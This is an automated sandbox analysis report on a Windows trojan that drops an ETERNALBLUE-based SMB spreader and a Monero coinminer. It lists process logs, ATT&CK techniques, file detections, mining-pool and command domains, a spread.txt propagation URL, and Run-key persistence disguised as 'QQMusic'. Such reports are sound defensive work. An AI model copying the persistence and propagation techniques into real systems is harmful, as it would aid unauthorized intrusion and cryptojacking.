Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe

Source: C:\Users\user\Desktop\x00zm3KVwb.exe

Code function: 19_2_0052C038 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

19_2_0052C038

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Network Share Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	1 System Time Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	31 Virtualization/Sandbox Evasion	Security Account Manager	211 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	11 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	5 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
x00zm3KVwb.exe	81%	ReversingLabs	Win32.Trojan.Vindor
x00zm3KVwb.exe	100%	Avira	TR/ATRAPS.Gen
x00zm3KVwb.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\spread.txt	100%	Avira	TR/ATRAPS.Gen
C:\ProgramData\X86.dll	100%	Avira	HEUR/AGEN.1303057
C:\ProgramData\syabcd.exe	100%	Avira	HEUR/AGEN.1353231
C:\ProgramData\SMB.exe	100%	Joe Sandbox ML
C:\ProgramData\spread.txt	100%	Joe Sandbox ML
C:\ProgramData\X86.dll	100%	Joe Sandbox ML
C:\ProgramData\syabcd.exe	100%	Joe Sandbox ML
C:\ProgramData\SMB.exe	75%	ReversingLabs	Win32.Exploit.ShadowBrokers
C:\ProgramData\spread.txt	81%	ReversingLabs	Win32.Trojan.Vindor
C:\ProgramData\syabcd.exe	70%	ReversingLabs	Win64.Coinminer.Luciminer

Source	Detection	Scanner	Label
https://ipinfo.io/	0%	URL Reputation	safe
http://www.baidu.com/search/spider.html	0%	Avira URL Cloud	safe
http://www.baidu.com/search/spider.html)95.179.220.100Windows	0%	Avira URL Cloud	safe
http://www.baidu.com/search/spider.html)	0%	Avira URL Cloud	safe
http://192.168.2.5:19490/spread.txt	0%	Avira URL Cloud	safe
http://%s:%d/spread.txt	0%	Avira URL Cloud	safe
https://xmrig.com/docs/algorithms	0%	Avira URL Cloud	safe
https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nishabii.xyz	218.244.58.70	true	true		unknown
auto.c3pool.org	88.198.117.174	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ipinfo.io/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.baidu.com/search/spider.html)	spread.txt.0.dr	false	Avira URL Cloud: safe	unknown
https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS	x00zm3KVwb.exe, spread.txt.0.dr	false	Avira URL Cloud: safe	unknown
http://www.baidu.com/search/spider.html)95.179.220.100Windows	x00zm3KVwb.exe, spread.txt.0.dr	false	Avira URL Cloud: safe	unknown
http://192.168.2.5:19490/spread.txt	X86.dll.0.dr	false	Avira URL Cloud: safe	unknown
http://%s:%d/spread.txt	spread.txt.0.dr	false	Avira URL Cloud: safe	unknown
http://www.baidu.com/search/spider.html	spread.txt.0.dr	false	Avira URL Cloud: safe	unknown
https://xmrig.com/docs/algorithms	syabcd.exe, 00000059.00000002.2062381455.00007FF66FAE1000.00000040.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
218.244.58.70	nishabii.xyz	China		4808	CHINA169-BJChinaUnicomBeijingProvinceNetworkCN	true

Private

IP
192.168.2.148
192.168.2.149
192.168.2.146
192.168.2.147
192.168.2.140
192.168.2.141
192.168.2.144
192.168.2.145
192.168.2.142
192.168.2.143
192.168.2.159
192.168.2.157
192.168.2.158
192.168.2.151
192.168.2.152
192.168.2.150
192.168.2.155
192.168.2.156
192.168.2.153
192.168.2.154
192.168.2.126
192.168.2.247
192.168.2.127
192.168.2.248
192.168.2.124
192.168.2.245
192.168.2.125
192.168.2.246
192.168.2.128
192.168.2.249
192.168.2.129
192.168.2.240
192.168.2.122
192.168.2.243
192.168.2.123
192.168.2.244
192.168.2.120
192.168.2.241
192.168.2.121
192.168.2.242
192.168.2.97
192.168.2.137
192.168.2.96
192.168.2.138
192.168.2.99
192.168.2.135
192.168.2.98
192.168.2.136
192.168.2.139
192.168.2.250
192.168.2.130
192.168.2.251
192.168.2.91
192.168.2.90
192.168.2.93
192.168.2.133
192.168.2.254
192.168.2.92
192.168.2.134
192.168.2.95
192.168.2.131
192.168.2.252
192.168.2.94
192.168.2.132
192.168.2.253
192.168.2.104
192.168.2.225
192.168.2.105
192.168.2.226
192.168.2.102
192.168.2.223
192.168.2.103
192.168.2.224
192.168.2.108
192.168.2.229
192.168.2.109
192.168.2.106
192.168.2.227
192.168.2.107
192.168.2.228
192.168.2.100
192.168.2.221
192.168.2.101
192.168.2.222
192.168.2.220
192.168.2.115
192.168.2.236
192.168.2.116
192.168.2.237
192.168.2.113
192.168.2.234
192.168.2.114
192.168.2.235
192.168.2.119
192.168.2.117
192.168.2.238
192.168.2.118
192.168.2.239
192.168.2.111

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1457365
Start date and time:	2024-06-14 16:38:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	226
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	x00zm3KVwb.exe renamed because original name is a hash value
Original Sample Name:	2cf24966a6aad7b6ecffe04a20eaf3dd.exe
Detection:	MAL
Classification:	mal100.troj.expl.evad.mine.winEXE@2333/8@68/100
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe
Excluded IPs from analysis (whitelisted): 93.184.221.240, 192.229.221.95, 2.19.126.154
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target syabcd.exe, PID 2468 because there are no executed function
Execution Graph export aborted for target syabcd.exe, PID 7840 because there are no executed function
Execution Graph export aborted for target x00zm3KVwb.exe, PID 7120 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtFsControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
VT rate limit hit for: x00zm3KVwb.exe

Simulations

Behavior and APIs

Time	Type	Description
10:38:58	API Interceptor	18471x Sleep call for process: x00zm3KVwb.exe modified
16:38:58	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run QQMusic C:\Users\user\Desktop\x00zm3KVwb.exe
16:38:59	Task Scheduler	Run new task: QQMusic path: C:\Users\user\Desktop\x00zm3KVwb.exe
16:39:07	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run QQMusic C:\Users\user\Desktop\x00zm3KVwb.exe
16:39:15	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run QQMusic C:\Users\user\Desktop\x00zm3KVwb.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
218.244.58.70	79XbLimLpY.elf	Get hash	malicious	Xmrig	Browse
218.244.58.70	UO2z4n1Sxx.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
nishabii.xyz	79XbLimLpY.elf	Get hash	malicious	Xmrig	Browse	218.244.58.70
	UO2z4n1Sxx.exe	Get hash	malicious	Unknown	Browse	218.244.58.70
	spread.exe	Get hash	malicious	ETERNALBLUE, Xmrig	Browse	42.51.49.168
	LSHT	Get hash	malicious	Unknown	Browse	122.114.183.128
	lq9ZRLjglJ.exe	Get hash	malicious	Xmrig	Browse	125.39.100.42
	LL	Get hash	malicious	Xmrig	Browse	125.39.100.42
	hajime-like	Get hash	malicious	Unknown	Browse	125.39.100.42
auto.c3pool.org	4xHN38uqxB.exe	Get hash	malicious	DoublePulsar, ETERNALBLUE, Xmrig	Browse	5.161.70.189
	UO2z4n1Sxx.exe	Get hash	malicious	Unknown	Browse	88.198.117.174
	4xHN38uqxB.exe	Get hash	malicious	Xmrig	Browse	88.198.117.174
	c3p.exe	Get hash	malicious	Xmrig	Browse	88.198.117.174
	SecuriteInfo.com.FileRepMalware.25283.7828.exe	Get hash	malicious	BlackMoon	Browse	5.161.70.189
	pg_ctlk.exe	Get hash	malicious	Xmrig	Browse	188.34.196.123
	logor.elf	Get hash	malicious	Xmrig	Browse	5.161.70.189
	qk6CviFPOs.exe	Get hash	malicious	Xmrig	Browse	5.161.70.189
	http://198.255.70.77:19490/spread.txt	Get hash	malicious	ETERNALBLUE	Browse	5.161.50.27

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CHINA169-BJChinaUnicomBeijingProvinceNetworkCN	YVjmPLIKXj.elf	Get hash	malicious	Mirai	Browse	221.221.242.176
	79XbLimLpY.elf	Get hash	malicious	Xmrig	Browse	218.244.58.70
	UO2z4n1Sxx.exe	Get hash	malicious	Unknown	Browse	218.244.58.70
	specifications.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	114.115.154.226
	http://test01-4b0.pages.dev/	Get hash	malicious	Unknown	Browse	115.182.9.46
	http://ygkkk.qubin.link/	Get hash	malicious	Unknown	Browse	115.182.216.178
	jew.arm.elf	Get hash	malicious	Unknown	Browse	114.240.17.27
	PO#WH2E0520.exe	Get hash	malicious	FormBook, GuLoader	Browse	114.115.154.226
	xVGenvURjj.elf	Get hash	malicious	Mirai	Browse	61.149.80.145
	PO_WIN69357.vbs	Get hash	malicious	FormBook, GuLoader	Browse	114.115.154.226

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://snappify.com/view/24a7ac79-d2b3-4d51-b9a0-abfa3b41b2b2	Get hash	malicious	Unknown	Browse	40.127.169.103 20.12.23.50
	https://boulderassociates-my.sharepoint.com/:b:/p/jsiedler/EWuN3LkL0-lAvjE8xdj-xWcBGqe_EqpoEsT8zVs-mIcKMQ?e=4%3auM1Jkx&at=9	Get hash	malicious	HTMLPhisher	Browse	40.127.169.103 20.12.23.50
	https://myworkspace554cb.myclickfunnels.com/onlinereview--8db19?preview=true	Get hash	malicious	Unknown	Browse	40.127.169.103 20.12.23.50
	S6q6zYbadV.exe	Get hash	malicious	Unknown	Browse	40.127.169.103 20.12.23.50
	1k2JiKk3qH.exe	Get hash	malicious	Unknown	Browse	40.127.169.103 20.12.23.50
	https://cf-ipfs.com/ipfs/bafybeicu4g2j3mwozajcx6hzr3i5afvvoinw2fz7bq4xtc2aa3gcywqhaa	Get hash	malicious	Unknown	Browse	40.127.169.103 20.12.23.50
	Fed#EGSU546725receipt.html	Get hash	malicious	Unknown	Browse	40.127.169.103 20.12.23.50
	https://firebasestorage.googleapis.com/v0/b/open-1bebe.appspot.com/o/sci.html?alt=media&token=cd1dbc1a-6097-4fcc-a13d-476f52e5185a	Get hash	malicious	HTMLPhisher	Browse	40.127.169.103 20.12.23.50
	https://firebasestorage.googleapis.com/v0/b/open-1bebe.appspot.com/o/sci.html?alt=media&token=cd1dbc1a-6097-4fcc-a13d-476f52e5185a	Get hash	malicious	HTMLPhisher	Browse	40.127.169.103 20.12.23.50
	tfEADWWZu3.exe	Get hash	malicious	Unknown	Browse	40.127.169.103 20.12.23.50

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\SMB.exe	4xHN38uqxB.exe	Get hash	malicious	DoublePulsar, ETERNALBLUE, Xmrig	Browse
	UO2z4n1Sxx.exe	Get hash	malicious	Unknown	Browse
	4xHN38uqxB.exe	Get hash	malicious	Xmrig	Browse
	spread.exe	Get hash	malicious	ETERNALBLUE, Xmrig	Browse
	lq9ZRLjglJ.exe	Get hash	malicious	Xmrig	Browse
	SecuriteInfo.com.Variant.Mikey.113879.32606.exe	Get hash	malicious	ETERNALBLUE	Browse
	t5UnDIIByu.exe	Get hash	malicious	ETERNALBLUE	Browse
	http://198.255.70.77:19490/spread.txt	Get hash	malicious	ETERNALBLUE	Browse
C:\ProgramData\syabcd.exe	4xHN38uqxB.exe	Get hash	malicious	DoublePulsar, ETERNALBLUE, Xmrig	Browse
	UO2z4n1Sxx.exe	Get hash	malicious	Unknown	Browse
	4xHN38uqxB.exe	Get hash	malicious	Xmrig	Browse
	spread.exe	Get hash	malicious	ETERNALBLUE, Xmrig	Browse
	lq9ZRLjglJ.exe	Get hash	malicious	Xmrig	Browse
	SecuriteInfo.com.Variant.Mikey.113879.32606.exe	Get hash	malicious	ETERNALBLUE	Browse
	t5UnDIIByu.exe	Get hash	malicious	ETERNALBLUE	Browse
	http://198.255.70.77:19490/spread.txt	Get hash	malicious	ETERNALBLUE	Browse

Created / dropped Files

C:\ProgramData\SMB.exe

Download File

Process:	C:\Users\user\Desktop\x00zm3KVwb.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3212420
Entropy (8bit):	7.969529352469518
Encrypted:	false
SSDEEP:	49152:p5/hdAYHnpyL5iNrLzPq/ful7zB/urjiVJuMn/D2lCm6wTE9ZKaJfFH136EE:p5oYHuwN3zPq/fs7FmKDuuLjm6NZnjE
MD5:	7B2F170698522CD844E0423252AD36C1
SHA1:	303AC0AAF0E9F48D4943E57D1EE6C757F2DD48C5
SHA-256:	5214F356F2E8640230E93A95633CD73945C38027B23E76BB5E617C71949F8994
SHA-512:	7155477E6988A16F6D12A0800AB72B9B9B64B97A509324AC0669CEC2A4B82CD81B3481AE2C2D1CE65E73B017CEBB56628D949D6195AAC8F6DDD9625A80789DFA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 75%
